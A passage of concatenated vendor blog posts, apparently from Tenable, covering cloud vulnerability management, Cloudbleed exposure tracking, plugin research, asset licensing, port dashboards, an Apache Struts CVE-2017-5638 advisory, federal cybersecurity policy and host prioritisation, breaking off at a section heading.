The current IT landscape has fundamentally changed the way that organizations view their security and assess their overall risk posture. Technologies like cloud, DevOps deployments and containers behave in a radically different way than traditional assets. For example, they are often shorter lived or they often have owners outside of the IT department. If threats and vulnerabilities aren’t detected on these assets, these differences can lead to security gaps, and these gaps can provide bad actors with a host of new opportunities. With that in mind, Tenable recently commissioned a report from IDC to examine how leveraging the cloud could help with modern security challenges.

Technology Spotlight

This IDC Technology Spotlight, Leveraging the Cloud to Achieve Comprehensive Asset Visibility, Tracking and Security, examines how the evolution of vulnerability management has left organizations with an even greater need for visibility into their assets and vulnerabilities, especially in new asset types like containers. Ayoub also delves into the advantages that can be experienced by organizations that use a cloud-based approach to vulnerability management.

According to IDC, the cloud-hosted security services market is growing rapidly, with vulnerability management being the fastest growing sub-segment. This rise in adoption of cloud-hosted security services is due to several benefits organizations can expect, including:

• Broad asset coverage, which delivers comprehensive visibility into all assets
• Integrated user experience, helping to improve productivity
• Simplified integrations to improve visibility and efficiency
• Elasticity, allowing organizations to scale as required

The cloud-hosted security services market is growing rapidly

Although cloud solutions can offer significant price and performance advantages, real or perceived data security concerns have deterred organizations from shifting their resources to the cloud in the past. However, those concerns seem to have dissipated somewhat; IDC projected 17.2 percent growth for the cloud-hosted Security and Vulnerability Management (SVM) market from 2014 to 2019.

One of the reasons for this change is the projected cybersecurity workforce shortage

One of the reasons for this change is the projected cybersecurity workforce shortage. Small, medium and large sized organizations alike, may look to shift their resources to the cloud to benefit not just from cost-savings, but for greater productivity achieved by security professionals who no longer have to manage the application itself when they move to a SaaS option. Rather than hiring the workforce to maintain on-premises security products, those resources can focus on actually using applications to address security challenges.

There’s also an increasing need to protect resources across all form factors, including physical, virtual, public cloud, containers, etc.

Tenable.io

Tenable has been working with many customers who are encountering similar challenges as reported by IDC, including how to account for modern assets like cloud, containers and mobile in their vulnerability management programs.

Tenable.io is a modern vulnerability management platform that provides the visibility and insight to protect what matters most

To address these challenges, Tenable recently announced the debut of Tenable.io. Tenable.io™ is a modern vulnerability management platform that provides the visibility and insight to protect what matters most to an organization. It delivers a fresh, asset-based approach that accurately tracks resources while accommodating dynamic assets like cloud and containers. Its streamlined and intuitive user experience, including pre-built templates and a consistent user interface, delivers value quickly and helps teams accomplish more.

With Tenable.io, customers benefit from an elastic licensing approach based on assets instead of IP addresses, making it easier to custom fit a vulnerability management solution to each unique environment. This approach makes it easy to accurately identify, track and license all of the assets in a given environment, without double counting, and eliminates the challenges associated with licensing mobile devices, public cloud instances, and short-lived virtual machines.

A fully documented API and integrated SDK help automate the sharing of Tenable.io capabilities and vulnerability data, and allow organizations to build on the Tenable.io platform. Pre-built integrations for patch management, credential management, mobile device management and other solutions make it easy for admins to leverage their existing investments.

For additional information, please download the full Technology Spotlight from the Tenable website.

Sources

IDC Technology Spotlight: Leveraging the Cloud to Achieve Comprehensive Asset Visibility, Tracking, and Security

On February 17, 2017 a Google researcher stumbled onto a situation that some are calling Cloudbleed, where services running on Cloudflare servers were inadvertently causing chunks of uninitialized memory to be mixed with valid data. The Google researcher posted this description on the discovery. The uninitialized memory can contain encryption keys, passwords and other sensitive data. This data leakage is very critical due to the amount of caching found on the internet today. With the widespread caching services, the extent of the leakage may be very hard to determine. Cloudflare reports that the bug has been patched and resolved; you can read more about this bug on the Cloudflare blog.

What does this mean to your company?

As this breach is passive in nature, the cached data has not yet been reported to be exploited. With the risk of passwords, encryption keys and other Personally Identifiable Information (PII) as part of the possible data leak, your company must be able to determine if data has been compromised or not. There are several lists of domain names published on github.com. However, for customers using SecurityCenter Continuous View® (SecurityCenter CV™) with Passive Vulnerability Scanner® (PVS™) and Log Correlation Engine® (LCE®), you can easily track and identify which internal systems are using services running on Cloudflare systems. After identifying the hosts and services used, the security analysts can begin to understand the risk to your organization.

Locating the data

When using PVS and LCE, the best practice is to have the PVS real-time logs sent to LCE for further analysis. As part of the configuration of PVS, there is a section called Realtime Events. In the Realtime Events, there are two settings to enable Log Realtime Events To Realtime Log File and Enable Realtime Event Analysis. These settings enable PVS to log session level events similar to NetFlow. Next, you must set up the syslog settings to send the data to LCE. Once real-time event data is sent to LCE, you will be able to see who is communicating with services using Cloudflare. Additionally, you can install the LCE client on DNS servers, which enables LCE to track DNS queries.

SecurityCenter CV has several types of asset lists that you can use to identify traffic patterns or groups of hosts with similar vulnerabilities or risks. The asset list best suited for detecting Cloudflare is a Watchlist asset. The Watchlist asset is a group of IP addresses that are of interest and need to be monitored, but which may not be local to your environment; for example, Cloudflare IPs. We looked up Cloudflare IP address blocks using American Registry for Internet Numbers (ARIN).  To create the asset, you can go to Assets and click Add. Next click on Type Watchlist, and give the asset the name Cloudflare add the following subnets to newly created asset:

• 104.16.0.0/12
• 108.162.192.0/18
• 162.158.0.0/15
• 172.64.0.0/13
• 173.245.48.0/20
• 198.41.128.0/17
• 199.27.128.0/21

Now click on Submit to save the asset. After creating the asset, and before proceeding to Analysis, allow the asset to update.

Locating systems with a possible data leakage

To locate the events that are evidence of hosts using services running Cloudflare, you must first go to Analysis > Events. According to the Cloudflare blog post, the dates of the greatest risk are February 13, 2017 to February 18, 2017. By expanding the filters, you can add in the explicit dates and the Cloudflare Asset. When adding the first date, be sure to set the time to 00:00; this will ensure that the filter starts at the beginning of February 13. Next, for the second date, set the time to 23:59, to ensure that the full day is captured.

The next step is to add the asset as part of the filter; this a two step process. First, click on select filters, and then add the Asset filter. The Asset filter is now available on the left hand side of the screen, and you can click All in the Asset field and enter the name of the Cloudflare asset:

Next click on Apply All to see the events related to Cloudflare. The first view you will see is the List of Event Types; these are the high level summary categories of events. For example, here are several event types that can help determine the risk your network is exposed to:

The web-access shows PVS tracking the type of HTTP calls made, such as web content, JPG files, PDF files, HTTP requests, and several others. Click on web-access, then select Jump to Raw Syslog Events in the upper right hand corner of the screen. Click on the plus sign + next to each log, and you can review the URL related HTTP request parameters. You can then review the details such as the source of the HTTP request and the URL visited. At this point, you must create a list of URLs that are related to your business risk and begin to investigate if your organization is at further risk.

Another great feature of tracking PVS event data with LCE is the ability to historically track vulnerabilities. In the following sample, you can see my lab has a Mac OS X system running a vulnerable browser. In this case, the vulnerability might not increase risk of the Cloudflare breach, but getting a good historic view of vulnerabilities detected by PVS is a great feature when combining PVS and LCE together.

Wrapping up

SecurityCenter CV is a powerful tool when fully implemented, and can aid your investigations when there are large data breaches such as Cloudbleed. By using LCE to track real-time events in PVS, you have a good historic view of vulnerability data and protocol level events. Combining PVS and LCE enables your organization to see the traffic and understand the content of the session. As the context of the Cloudflare traffic is revealed, you can better understand and assess the risk to your organization. Tenable provides our customers with a full-featured threat and vulnerability analysis that far exceeds those of our competition.

Are you pluggin’ along looking for vulnerabilities? The heart of Tenable vulnerability detection comes from the individual tests called plugins– simple programs that check for specific flaws. Each plugin contains a vulnerability description, fix recommendations, and algorithms for detection. Tenable products receive new plugins nightly, which keep the tests current and relevant.

Finding plugin information

 SecurityCenter® has at least four places to research plugins:

You can also find plugins in other Tenable products.

Nessus® takes a few clicks to drill down to plugins. Go to Policies / New Policy / Advanced Scan /Plugins. Then select a family on the left and a plugin on the right:

You can also see Nessus plugin information in scan results and by drilling down on individual plugin results. This provides similar information as VDL in SecurityCenter.

Tenable.io™ provides very similar information as Nessus, both in content and location (see Tenable.io Vulnerability Management for information about this new application).

You can use three places on the Internet to research plugins:

• Plugins: This site is very useful. The Tenable Support Portal also links to the Plugins.

• Tenable Community: provides technical discussions on individual plugins. Use this site to see how a plugin is used by others.

• Google: Of course, an organic search for a Nessus Plugin Name or ID is often the easiest to remember.

Explanation of plugin sources

Each plugin source has its advantages and peculiarities. They vary in the information provided. Here are the nine sources, comparing their advantages and unique details.

Plugin

This source provides many fields to search on. I use Plugin Name or Plugin ID most often.

This view has several unique characteristics. First, it shows the plugins currently in SecurityCenter:

Second, this source enables you to search against the audit files that have been activated in your SecurityCenter installation. For example, you can see the compliance password tests:

i icon

Clicking the small i icon results in voluminous information. If you carefully search through the Details tab’s Solution section, you can find the plugin’s source filename:

A second Source tab (top right) displays the plugin’s actual scripting in Tenable’s proprietary Nessus Attack Script Language (NASL):

Not all plugins are provided in NASL. Others plugins are compiled to protect confidential techniques.

VDL

You can find a gold mine of information in the VDL analysis tool. This is usually the best resource for researching plugin results.

• The Plugin output field is one of the most valuable fields, because you can see the actual response from the target during testing. It stands out with green-on-black coloring:

• The VDL output is the best for assessing risk and how the CVSS score was tallied. It includes the vector, the version, and more.

• If a publicly-known exploit is available, the VDL will provide details. In this example, the specific Metasploit module is specified:

• VDL includes ties to many industry vulnerability sources like BID, IAVM, CVE, and CERT announcements:

• VDL also references frameworks like 800-53, CSF, PCI, ISO 27000, Critical Security Controls (formerly SANS top 20) and several others. Tenable provides audit files, which in the individual stanzas correlate the framework modules by tags in the Reference field. The tags enable framework dashboards, reports, and Assurance Report Cards® to automatically populate with appropriate scan results related to the framework. A listing of related audit files can be found by posting a specific question on the Tenable Community.

• The Host field includes items such as the date that the vulnerability was first seen. It also gathers asset identity details like DNS, NetBIOS, and MAC address.

Admin overview dashboard

After logging in as admin, I like to sort by modified date to see when plugins arrived. The date for the newest plugin downloads should be less than 24 hours (except for an offline SecurityCenter). I also like to see what issues the recent plugins address.

Nessus

Finding plugin information takes several steps. Nessus also provides many fields about a plugin.

To identify risk severity, Nessus shows both CVSS versions two and three in the detailed view.

Tenable.io

Similar to Nessus.

www.tenable.com/plugins/

This has been my favorite interface to work with for quick lookups. It also lists plugins by families. The Plugins portal includes several pages:

• Helpful screens on newest plugins and options on obtaining an activation code for plugin updates.
• View all plugins provides the latest count of plugins at the top. The page is organized by research plugin families.
• Search: I often start my research here. I usually search by Plugin Name and Plugin ID.

Example: A customer asked if Tenable had any tests for nginx. I typed in nginx, searched with Plugin Name, and was surprised by how many plugins were listed.

TIP: Though the page suggests using double quotes for an exact search, I have not had success with that search technique.

Be aware that this page is showing Nessus plugins only. To see the PVS™ plugins, go to bottom left of the page, click Product Resources, and then click PVS Plugins.

Tenable Community

This portal provides technical discussions between customers and Tenable support staff. I often search it to see how others use a particular plugin.

This site is especially helpful for late-breaking vulnerabilities. Here is an example with the recent GRIZZLY STEPPE exploit:

Google

Even if you forget the first eight sources, you will probably remember to use Google (or another search tool). It often points to information from sources 7 and 8.

Common questions and tips

Tip #1: What is the best plugin?

I nominate Nessus Scan Information, #19506. I chose this plugin even though it does not do any vulnerability testing. It gathers many scan forensics like how long the scan took, if the credentials worked, what scanner was used, and more.

Details include:

This plugin is often used as part of a daily discover scan to identify a new host on the network. See my blog about Favorite SecurityCenter Asset Lists for details.

What is your favorite plugin? Let us know at the Tenable Community. Also feel free to request plugins you would find helpful that we currently do not provide.

Tip #2: Can customers code plugins?

Yes. Some sage advice comes from Ron Gula, Tenable co-founder, in a Tenable Community posting:

Tenable does not officially support custom NASLs as part of our support program but if you look in the API section you will see plenty of responses from Tenable staff answering questions about NASLs in general.

Most of the time, what people need to do with a NASL is actually already covered by another NASL or covered more easily by writing an .audit policy.

You can easily add tests to an audit file with PowerShell commands for Windows targets, or with a Linux command or script.

Tip #3: How do I set up a plugin-specific scan?

Identify the plugin IDs and their family that you want to use in the policy. Scan policies that are crafted with only individual plugins do not change their contents after nightly updates.

The Nessus User’s Guide provides excellent directions on setting up the scan.

SecurityCenter provides a helpful search filter for locating the individual plugins to build a new scan policy:

Tip #4: What dates can I find on plugins?

Plugins have four different dates: vulnerability release, patch release, initial plugin release, and latest date for plugin modifications. You can find two additional dates in the plugin results: when the vulnerability was originally discovered on a particular system and when the vulnerability was last observed. The periodicity of the last two dates depends upon the frequency of scans.

Tip #5: Which plugins do not count against the IP license?

The answer is in the SecurityCenter User’s Guide, but know that this list does change:

Summary

Plugins are invaluable tests that Tenable provides for tracking down vulnerabilities. You can find detailed plugin information within the products or on the internet. While Tenable provides lots of good information, sharing tips with other users is often quite helpful. Please share your plugin tips or questions in the Tenable Community!

Have you ever asked yourself why vulnerability management products are still licensed according to the quantity of scanned IP addresses? Maybe you have learned to accept it. Vendors have done it this way for years. This is how it works. So what is the problem?

The IP-based licensing issue

An IP address no longer uniquely identifies an asset ... a single asset can consume multiple licenses

The problem is that with virtual infrastructure and mobile laptops, tablets and phones, an IP address no longer uniquely identifies an asset. My laptop’s IP address changes as it moves from my home office to the corporate office and then to a hotel. Vulnerability scans performed when my laptop is at these different locations will identify my laptop as three different devices and will create a separate record for each identified device. IP-based licensing isn’t just a problem for laptops. Many servers have multiple network interfaces - one for production, one for administration, and one for backup - each with a different IP address. The result: a single asset can consume multiple vulnerability management licenses.

Customers and vulnerability management vendors all recognize the problem and negotiate workable compromises. For example, a customer knows they have 10,000 assets, but the VM product identifies 12,000 IPs. The customer negotiates a discount based on the discrepancy and life goes on. No problem, correct?

Corrupted IP-based metrics

A more significant problem is corrupted vulnerability management metrics

Unfortunately, license negotiation is only the tip of the iceberg. Arguably, a more significant problem is corrupted vulnerability management metrics. Let’s take another look at the example of a laptop having been scanned as three different IPs. Let’s assume that three critical vulnerabilities were discovered by each scan. The security team’s vulnerability reports include three entries for the laptop, each with three critical vulnerabilities. IT operations connects to the laptop and remediates the ten critical vulnerabilities. They then run a verification scan against the current IP address to confirm the vulnerabilities have been remediated. However, the remediation scan won’t update the vulnerability status for the prior IP addresses. This makes the IT operations team look ineffective and causes them to chase their tail, pursuing non-existent assets. In turn, this creates unnecessary friction between the security and operations teams.

Elastic Asset Licensing

Tenable.io Vulnerability Management tackles this problem head on with Elastic Asset Licensing, which uses an advanced asset identification approach. A single asset may have multiple attributes that Tenable.io can use to positively identify it as a specific asset. Some example attributes in addition to IP address are:

• Tenable UUID
• BIOS UUID that is found in its firmware
• MAC address that is stored in it networking hardware
• NetBIOS name
• Fully qualified domain name (FQDN)

An authoritative identifier eliminates double and triple asset counting

The Tenable UUID may have caught your eye. Tenable.io agents and authenticated scans on supported platforms can assign a Tenable universally unique ID to an asset. This authoritative identifier eliminates double and triple asset counting, and greatly improves the accuracy of vulnerability management metrics. At last, security and operations can have a fact-based dialogue about the state of assets and their vulnerabilities.

Decommissioning assets

So far, I have talked about the problem of IP-based licensing. Now, consider the problem of decommissioning assets. First, some background. Today’s on-demand IT environments are highly elastic. For example, virtual machines can be spun up, scanned, spun down - all within a few hours - and then never seen again. Additionally, physical assets are typically decommissioned after 3-5 years, resulting in a 20-33% annual decommission rate.

With most vulnerability management products, these “absent-without-leave” (AWOL) assets consume licenses unless and until a manual reclamation project frees the licenses - and who really wants to be assigned to a digital archeology project like that?

Tenable.io Elastic Asset Licensing automatically reclaims licenses from assets that have not been scanned for 90 days

Tenable.io Elastic Asset Licensing solves the “AWOL problem” by automatically reclaiming licenses from assets that have not been scanned for 90 days, without requiring resources to conduct a manual digital archeology project. Although the licenses are reclaimed after 90 days, the asset and vulnerability data is not deleted. It remains for fifteen months. So if the AWOL asset reappears, the new asset and scan data will be appended to the existing data to deliver an accurate picture of the asset and its vulnerabilities.

Summary

Rigid IP-based licensing had a good run, but the time has come for it to be replaced by Elastic Asset Licensing with its greatly improved asset identification and automatic license reclamation.

Vulnerabilities within network services may result in data loss, denial of services, or allow attackers to facilitate attacks against other devices. Checking for insecure or non-essential services is critical to reducing risk on the network. By identifying open ports along with their associated services, you can ensure said services are necessary and the associated risks are mitigated accordingly. Leveraging Tenable.io™ enhanced vulnerability management capabilities provides an effective way to detect port and service related vulnerabilities, and provides insight into hidden security risks, enabling you to make better informed decisions to protect your organization.

The vast majority of network attacks are focused around easily identified vulnerabilities which can be exploited

The vast majority of network attacks are focused around easily identified vulnerabilities which can be exploited. Targeted attacks utilize a particular vulnerability and a well defined methodology. The Tenable.io Vulnerabilities by Common Ports dashboard leverages a variety of port filters to display vulnerability information in multiple ways. This dashboard can assist you in identifying any potential risk associated with open ports and services.

What are we protecting and why are open ports important?

A port can be thought of as a refinement of a computer's IP address. A packet destined for an IP address will be routed to the device that owns that particular IP address. This IP address only identifies the device on the network. A port further defines where that packet should be delivered, and defines the type of connection that should be made. An open port is essential for devices using a specific protocol to connect with each other. The Internet Assigned Numbers Authority (IANA) has developed several port categories:

• 1 to 1023 are known as Well Known Ports
• 1024 to 49151 are known as Registered Ports
• 49152 to 65535 are known as Dynamic Ports

Well Known Ports usually make some type of network connection, and are typically assigned to a particular network protocol. These well known ports are described by the IANA as ports that “can only be used by system (or root) processes or by programs executed by privileged users.” Ports in this range are assigned a specific network protocol. Registered Ports are defined as ports that “can be used by ordinary user processes or programs executed by ordinary users.” Registered ports are typically available to any program that wishes to use them. While the IANA does in fact register port numbers in this range, they do not assign a network protocol. Finally, Dynamic Ports are defined as “unassigned and unregistered ports for private applications, client-side processes, or other processes that dynamically allocate port numbers.”

Increasing network visibility with port usage data

“Common ports” is a further refinement of the port ranges of Well Known Ports to describe those ports that are commonly found across multiple systems. For example, you will likely find ports such as 22/SSH, 25/SMTP, 80/HTTP, and 443/HTTPS, open within most organizations. Vulnerabilities associated with those ports can be easily targeted for intrusion by attackers. Understanding what ports are open within the network is a good step in reducing the probability of compromise, and in some cases improving performance.

Understanding what ports are open within the network is a good step in reducing the probability of compromise

Network attacks are not always quickly identifiable. Many attacks are low and slow, creating command and control channels that allow them to exfiltrate more data and remain undetected for longer periods of time. The complexity of networks, and the multitude of open ports across an organization make identifying threats increasingly difficult. The simplest, most straightforward, and costliest approach is a reactive stance where you wait for something to happen and fix it. But that’s not the best approach. The best solution is to proactively scan and analyze the network infrastructure. Tenable.io enables analysts to compare known open ports between scans. New active ports and vulnerabilities can be detected, avoiding potential blind spots where new services are installed or enabled.

Setting attainable goals

The Vulnerabilities by Common Ports dashboard identifies vulnerabilities associated with commonly used ports, and provides analysts with a reference point to identify port related vulnerabilities. This is not to say that ports themselves are vulnerable, as ports themselves do not have vulnerabilities. Vulnerabilities exist in the services associated with the ports. During a scan, ports are queried. The results of the query may be a banner, or other information that is returned by the service running on the specified port. The information is utilized to quickly and easily determine what service is running on the port, and if a vulnerability has been identified.

Two components that aid analysts in easily attaining these goals are the Counting Hosts by Common Ports and the Port and Protocol components. Each component communicates risks and aids in the identification of vulnerabilities, unknown services, or backdoors, which are associated with various open ports and services. The Counting Hosts by Common Ports component enumerates vulnerable hosts providing details based on specific ports and severity levels.

The Port and Protocol component also provides a count of vulnerabilities by severity level, adding active and passive vulnerability results by TCP and UDP protocol. Port ranges from 0-1024, covering all Well Known Ports, along with severity levels of low, medium, high, and critical, are displayed. With each component, a percentage of exploitable vulnerabilities is also displayed.

Using CVSS to identify vulnerabilities by ports

The Common Vulnerability Scoring System (CVSS) provides a robust and useful scoring system for vulnerabilities. CVSS is owned and managed by FIRST, a US-based non-profit organization, whose mission is to help computer security incident response teams across the world.

CVSS is widely used, providing an open and universal standard for severity ratings, and helps determine the urgency and priority of responses. Vulnerabilities can be quickly identified and tracked based on CVSS score. Within the dashboard’s CVSS Vulnerability Counts per Port component, vulnerabilities can be selected by severity or port range. Analysts can quickly identify and select vulnerabilities and mitigate risks due to unnecessary and vulnerable services.

The CVSS Vulnerability Counts per Port component uses a combination of CVSS scores and severity ranking to communicate the risk of discovered vulnerabilities.

Details for ports vulnerabilities less than 1024, greater than 1024 and unique filters for FTP, SSH, SMTP, HTTP and HTTPS are included. The colors used to communicate the severity levels are yellow (medium), orange (high), and red (critical).

Wrapping up

As you work to address your risk mitigation tasks and track progress, the Tenable.io Vulnerabilities by Common Ports dashboard provides key analytics. Use the dashboard to greatly reduce the time and effort to review and mitigate risks associated with common ports. Whether you are communicating up the chain, to peers, or to your team, this dashboard provides a thorough look at your outstanding risk with ports and services.

Interested in learning more about Tenable.io?

• Visit the Tenable.io area of our website
• Start a Tenable.io Vulnerability Management trial today

Good cyber hygiene starts with visibility into all assets on your network. But with today’s infrastructures expanding into the cloud, web apps, virtual machines, DevOps containers, IoT and mobile devices, the network perimeter is disappearing and a comprehensive inventory is challenging to achieve.

This "elastic attack surface" is expanding rapidly, creating security gaps and business risks.

In a recent article on Dark Reading titled Securing Today's 'Elastic Attack Surface' Amit Yoran shares his thoughts on modernizing the vulnerability management program and securing the elastic IT environment.

Read the full article

A remote code execution vulnerability (CVE-2017-5638) in the Jakarta Multipart Parser in certain versions of the Apache Struts framework can enable a remote attacker to run arbitrary commands on the web server. Since its initial disclosure, this vulnerability has received significant attention, and is reportedly exploited in the wild. Public exploits are also available for this vulnerability. Customers are advised to immediately patch their servers to the latest versions of Apache Struts or implement recommended workarounds.

Vulnerability details

A remote code execution vulnerability exists due to a weakness in the way that the Jakarta Multipart Parser component of Apache Struts processes Content-Type headers during a file upload. By exploiting this flaw, a remote attacker could execute arbitrary commands on the remote host subject to the privileges of the user running the web server. Authentication is not required to exploit this flaw.

Tenable coverage

Tenable has released two plugins to detect this flaw in your network. Plugin 97610 is a remote plugin and will attempt to exploit the flaw against target URLs that are discovered by webmirror. A successful scan of a target will produce the following results:

If you suspect your system is vulnerable, but it is not reporting something similar, check the scan’s Audit Trail for plugin 97610. Nessus may have difficulty crawling some web applications and you may need to adjust policy settings to add a specific URL. This can be done under Assessment > Web Applications> Web Crawler> Start crawling from in the policy:

In addition to our remote check, a local version check is available for Windows targets (plugin 97576). Note that this plugin only runs in scans where the Accuracy setting is set to Show potential false alarms.

What customers should do

Customers who are affected by this vulnerability should upgrade to Apache Struts version 2.3.32 or 2.5.10.1. A workaround is available for Apache Struts version 2.5.8 - 2.5.10.1. This workaround is documented at https://cwiki.apache.org/confluence/display/WW/S2-045.

Due to the nature of this vulnerability, it is critical that vulnerable hosts are patched as quickly as possible. By leveraging the remote check available from Nessus, it is possible to scan all of your web applications to identify any application that is using an outdated version of Struts.

Thanks to William Spires for his contributions to this blog.

Securing the government’s information systems is one of the most important tasks facing the new administration. It is a challenge that agencies have struggled with for over 20 years, and with the increasing complexity of federal networks, it is becoming more difficult. Like their private industry colleagues, agencies are turning to cloud and IoT technologies to increase access and efficiencies. In doing so, they must address the exposure of their entire attack surface, including legacy platforms and these new technologies.

Early White House appointments and a pending executive order demonstrate a focus on accountability and regaining control of government networks.

It takes more than money

The government’s primary weapon in the fight to secure its networks has been money. The recently released budget blueprint includes a proposed $1.5 billion for the Department of Homeland Security to protect Federal networks and critical infrastructure from attack.

Throwing money at the problem will not solve it

My experience in and observation of cybersecurity efforts has shown that throwing money at the problem will not solve it. It is more important to make cybersecurity a cultural priority first and foremost. Organizations in government or industry which embrace the inherent importance of cybersecurity and exercise good systems and cyber hygiene are orders of magnitude more secure than those that spend more and prioritize less. Organizations and agencies need to understand their exposure and address the problems that have been there for years. Traditional cybersecurity focus on the network perimeter is no longer adequate. Technologies like cloud, IoT and DevOps processes introduce vectors that bypass the perimeter on the way into agencies’ systems and data. If you haven’t picked up on the irony of it, most of the high profile breaches are the result of adversaries exploiting well-known vulnerabilities and exfiltrating sensitive data.

Most high profile breaches are the result of adversaries exploiting well-known vulnerabilities

If network administrators and security professionals do not know their networks, they cannot possibly defend them. Knowing your network means knowing the architectures, systems, protocols, applications, users, data types, and the business and mission processes they support. This simple prerequisite for success gets incredibly challenging when you think about the proliferation of non-traditional compute platforms and processes across the enterprise.

The President is expected to appoint the National Security Agency’s Rob Joyce to handle government cybersecurity policy. Joyce, who heads NSA’s Tailored Access Operations hacking group, would work under homeland security advisor Tom Bossert, a former national security aide to President George W. Bush.

Joyce, with his hands-on experience in penetrating the networks of adversary nations, brings a great perspective to U.S. cybersecurity. At last year’s 2016 USENIX conference, he explained that there is no magic bullet for attacking or defending a network. The key to successfully attacking a network is “to know it better than the people who designed it and the people who are securing it.” Conversely, the key to defense is to know your own network better than your adversaries.

The key to defense is to know your own network better than your adversaries

Applying this message to U.S. cybersecurity means complete discovery and mapping of networks, identifying all systems and devices and assessing their configuration and security status. The National Institute of Standards and Technology has produced a library of cybersecurity standards and best practices, but this guidance cannot be used until agencies are aware of their networks and can monitor their systems.

Having a cybersecurity advisor in the White House who understands and lives by this will help ensure that agencies properly prioritize their cybersecurity efforts. The final version of the president’s executive order on cybersecurity has not yet been released, but I am encouraged that draft versions would hold agency heads accountable for their cybersecurity. Accountability is a powerful tool for focusing attention on the basics and to deny intruders the opportunity to burrow into our systems. Those of us who work in the commercial sector must also refrain from resting on our laurels. Staying ahead of our adversaries is a shared responsibility for all of us.

As a non-partisan issue, I have confidence that Bossert and Joyce will help bring a new focus to U.S. cybersecurity, and will work constructively with the private sector and government leaders to bring the best intelligence, process and technology to bear on the task of defending our networks.

Continuity and change

The new administration does not have to start from scratch to form its cybersecurity policy. Cybersecurity has been a priority of previous administrations, and despite shortcomings, there have been important contributions that the president and his advisors can build on, including the NIST Cybersecurity Framework, the DHS Continuous Diagnostics and Mitigation (CDM) program, and the proposed IT Modernization Fund.

Change happens when cybersecurity is elevated to the highest priority in an organization

By building on what works and focusing on the basics of improving the security of our networks, we now have a chance to move government cybersecurity into a new era. Change happens when cybersecurity is elevated to the highest priority in an organization, including government. We must all protect the modern IT landscape, make smart investments in people and technology, improve cooperation, and embrace accountability to succeed.

Successful vulnerability management (VM) programs aren’t isolated programs. Successful ones include active participants from multiple teams who can share data and results with each other, so that everyone benefits from greater visibility, automation and control. And while in the past VM providers haven’t made their products easy to integrate with, that changes with Tenable.io™. We designed Tenable.io to be the most open VM solution, with multiple ways to integrate it with other products and/or into your workflows and business processes.

Pre-built integrations

With Tenable.io, there’s a strong set of pre-built integrations with complementary systems

With Tenable.io, there’s a strong set of pre-built integrations with complementary systems. For example, there are integrations with credential management systems which make it easier for you to access credentials when doing authenticated scans. There are integrations with patch management systems to make it easy to compare vulnerability results. And integrations with mobile device management systems give access to mobile data that would otherwise be very difficult to access. You can learn more about these and other integrations at our Tenable.io integrations page.

Robust and well-documented API

All the capabilities of Tenable.io Vulnerability Management are available in the API

Even if you’re not currently a customer, you can still take a look at the Tenable.io API today. It’s publicly available and, as you’ll see, is fully documented, simple and testable directly in the browser. All the capabilities of Tenable.io Vulnerability Management – accurate asset tracking, vulnerability states, workbenches and reports, etc. – are available in the API so that customers and partners can use any data they need in an automated fashion.

Easy-to-use Software Development Kit (SDK)

A dedicated SDK takes a task-oriented approach to using the Tenable.io API

Since not everybody is a programmer, but might still wish to access Tenable.io capabilities and data programmatically, we also created a dedicated SDK, which takes a task-oriented approach to using the Tenable.io API. For example, if you want to run a scan, the scan.launch() function wraps up a variety of API calls into one single line of code.

The current Python SDK is available on GitHub. Additional language support will be available in the future and we’ll continue to enhance the SDK as Tenable.io gains more capabilities. Both customers and partners who want to integrate with Tenable.io, but who lack developer resources to do so, will find the SDK invaluable.

Wrapping up

Integrations make your vulnerability management program more successful, by enabling you to make full use of existing technology investments and by helping to automate manual tasks, so you can focus on the most critical issues. With multiple options available, Tenable.io is easy to integrate into your environment in whatever way makes best sense for your organization.

Integrations make your vulnerability management program more successful

Interested in learning more?

• Visit the Tenable.io area of our website
• Start a Tenable.io Vulnerability Management trial today

What systems on your network need attention now? With all the administrative work you need to have done by yesterday, how do you prioritize mitigation efforts to deal with host vulnerabilities? The enhanced vulnerability detection capabilities of Tenable.io™ can help you make the best prioritization decisions for keeping your network secure. The Prioritize Hosts dashboard presents several lists of hosts requiring immediate attention, such as top hosts infected with malware and top hosts with exploitable vulnerabilities, to help you decide which hosts should be prioritized first.

Top priority assets to secure

The Top Hosts Infected with Malware table displays the top hosts on the network that have detected malware infections. The plugin family Backdoors is used to detect malware on the hosts. A count of malware detections and a bar graph indicating the severity of the malware are given for each host. The hosts presented in this table are probably already compromised, making them the highest priority to deal with before an infection can spread.

To learn more about these malware infections, go to the Vulnerabilities Workbench and set an Advanced filter of Plugin Family equal to Backdoors:

Once the filter is applied, clicking on individual vulnerabilities in the table at the bottom of the Workbench will bring up the malware infection vulnerability details. These details include the vulnerability description and the assets the vulnerability was detected on, and may also include information such as plugin output, last seen time, and solution information.

The Top Hosts with Exploitable Vulnerabilities table displays the top hosts on the network that have vulnerabilities that are known to be exploitable. Well-known exploits such as Shellshock are added to exploit frameworks like Metasploit or Core Impact to allow pen testers to exploit vulnerable systems. Unfortunately, malicious adversaries also use these frameworks to attack companies. This table is showing systems that are vulnerable to these frameworks and other malware known to exist in the wild. I find these vulnerabilities particularly concerning because any script kiddie can easily knock over any of your machines that have one of these vulnerabilities. I recommend making these hosts a high priority to lock down—especially if they are internet-facing!

To learn more about these exploitable vulnerabilities, go again to the Vulnerabilities Workbench and this time set the Advanced filter of Exploit Available equal to true:

As before, clicking on an individual vulnerability will bring up the details:

These details provide lots of useful information, including the vulnerability description and the assets the vulnerability was detected on. Also included may be plugin output, when the vulnerability was first seen, reference information, and links to go to for more information. Most importantly, solutions to the vulnerabilities are given. In almost all cases, the solution to these exploitable vulnerabilities is to patch your applications and operating systems, and upgrade older versions of software.

Prioritizing assets using vulnerability plugin families

The Top Hosts Running Vulnerable Web Servers table displays the top hosts with web server vulnerabilities and vulnerabilities in web technologies such as PHP and OpenSSL. These vulnerabilities are troublesome because they may allow an attacker to access data that should not be publicly accessible. Leakage of this data can lead to loss of sensitive information and may even put people at risk of identity theft. You will likely discover that you have more web servers on your network than you thought you did, which is a security risk as well! Make sure all detected web servers are authorized, and that they are properly secured.

For details on these web server vulnerabilities, go to the Vulnerabilities Workbench and set the Advanced filter of Plugin Family equal to Web Servers. In addition, to only display those vulnerabilities that are of most concern, set a filter of Severity not equal to None:

Both the Top Hosts Infected with Malware table and the Top Hosts Running Vulnerable Web Servers table make use of filters on Plugin Family. You can use other plugin family filters to detect other types of vulnerabilities on assets. For example, you may want to know how vulnerable your databases are: you can use the Databases plugin family. Other plugin family suggestions are Firewalls, SCADA, Cisco, and local security checks for various operating systems. Use the plugin families that are appropriate in your environment to help you prioritize assets to secure, and check the vulnerability details for guidance on how to secure the assets.

Prioritizing assets using vulnerability keywords

